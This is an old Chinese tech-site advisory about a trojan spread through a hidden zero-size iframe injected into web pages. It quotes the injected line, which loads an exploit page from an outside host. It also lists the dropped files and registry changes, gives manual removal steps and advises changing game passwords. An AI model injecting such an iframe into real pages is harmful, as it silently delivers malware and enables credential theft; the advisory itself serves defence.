新发现一种木马及其清除方法

互联网 | 编辑: 2004-09-29 11:25:39
但因不明原因 , 某些网页原始档内竟出现了以下HTML码 :

  《iframe src="www.ta.sdcrc.com/fk/js/smss.htm" name=zhu width="0" height="0" frameborder="0"》

  ? 不熟悉DHTML的版友应该会有疑惑 , 这行的用途是?

  该行HTML码的用途在于悄悄于网页中开启一个 长宽都设定为 0 , 没有边框的框架页

  换句话说 , 该行程序代码意图加载一个网页 , 但希望让使用者无法发现...

  ...

  不用说 , 这时候大家应该发现不妙的地方了

  这不正是许多马夫所惯用的手法 ... !?

  -- 该木马资料 --

  以 F-Secure Anti-Virus 扫毒到资料为准的话 , 该网页共将植入

  TrojanSpy.Win32.Delf , 以及 Exploit.HTML.Mht

  两文件 , 以Exploit.HTML.Mht为引 , 植入 TrojanSpy.Win32.Delf

  TrojanSpy.Win32 此木马会于 WindowsSystem32 中 , 植入两个文件 , 分别为 :

  1. exploret.exe

  2. systemlt.dll

  并将更动登录机码 , 以于重新开机后木马将正式加载

  -- 可能受害的危险群 --

  1. 在网咖进行游戏者 (尤指该网咖Windows未更新者)

  2. 在家进行游戏 , 但Windows并未开启自动更新 , 也很久未手动更新者

  这只木马所植入的方式是抓过去IE中的一个漏洞 , 但已被修正

  因此有更新Windows的版友(可能)较不需担心

  -- 中毒征兆 --

  若你有看过该公告 , 且执行天二时发现 扫毒用的那只 猫 不会出现 !?

  取而代之的是 Can't run nProtect **** **** 的字样的话

  便是确定中毒了

  若之后有登入天二 , 请依照下列方式移除木马后 , 重新开机

  并尽速前往官方网站变更密码

  -- 重新开机后该木马移除方式 --

  1. 请打开工作管理员 , 强制关闭 exploret.exe 的执行

  2. 请至 System32 底下 , 将exploret.exe , systemlt.dll 两文件删除

  3. (此动作较为危险 , 执行前请务必确定你会使用登录编辑器)

   请于执行输入 REGEDIT , 开启登录编辑器

   然后请点击 [编辑] -> [寻找] , 输入字符串 exploret.exe , 让登录编辑器自动搜寻

   最后请把所有发现有 exploret.exe 字样的子机码值均删除即可 (约有3-4个)

   PS: 如果没发现 , 请使用 exploret 当条件试试看

  -- 重要的备注 --

  *1. 可能的话 , 请大家将身分证与新密码 , 均先另行写在新txt文件中

  以复制贴上的方式变更密码 , 这方式较能确保安全

  *2. 若有可能 , 请大家安装防火墙并更新Windows ... 这才是确保未来安全的唯一之道

  *3. 大家一定要注意不要乱访问网页,尤其是针对天2的连接。

相关阅读

每日精选

点击查看更多

最新快讯

热门文章

首页 手机 数码相机 笔记本 游戏 DIY硬件 硬件外设 办公中心 数字家电 平板电脑